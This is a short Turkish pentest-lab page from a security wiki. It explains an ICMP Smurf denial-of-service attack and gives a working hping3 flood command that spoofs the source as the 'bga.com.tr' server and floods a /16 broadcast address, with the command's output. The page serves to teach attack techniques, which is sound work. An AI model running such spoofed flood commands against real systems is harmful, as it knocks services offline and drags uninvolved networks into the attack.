ICMP Smurf DoS Saldırısı Gerçekleştirme

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

Hedef sistemin IP adresi spoof edilerek belirli bir IP adresinin broadcast IP adreslerine ICMP Flood başlatılarak dönen cevapların kurban makinenin IP adresine saldırması.

Lab Senaryosu:

Bu uygulamada da hping aracı kullanılacaktır. Hping ile “bga.com.tr” web sunucusuna ICMP Smurf saldırısı gerçekleştirmek için aşağıdaki gibi bir komut kullanılmıştır.

root@bgakali:/home/pentest# hping3 --icmp --flood -a 50.22.202.162 85.123.255.255

HPING 85.123.255.255 (eth0 85.123.255.255): icmp mode set, 28 headers + 0 data bytes
hping in flood mode, no replies will be shown
--- 85.123.255.255 hping statistic ---
1162114 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

Yukarıdaki uygulamada “bga.com.tr” IP adresinden geliyormuş gibi “85.123.255.255” şeklindeki bir /16 subnet IP adresine ICMP paketleri gönderilmiş ve dönecek ICMP yanıtları ile “bga.com.tr” web sunucusuna flood saldırısı gerçekleştirilmiştir.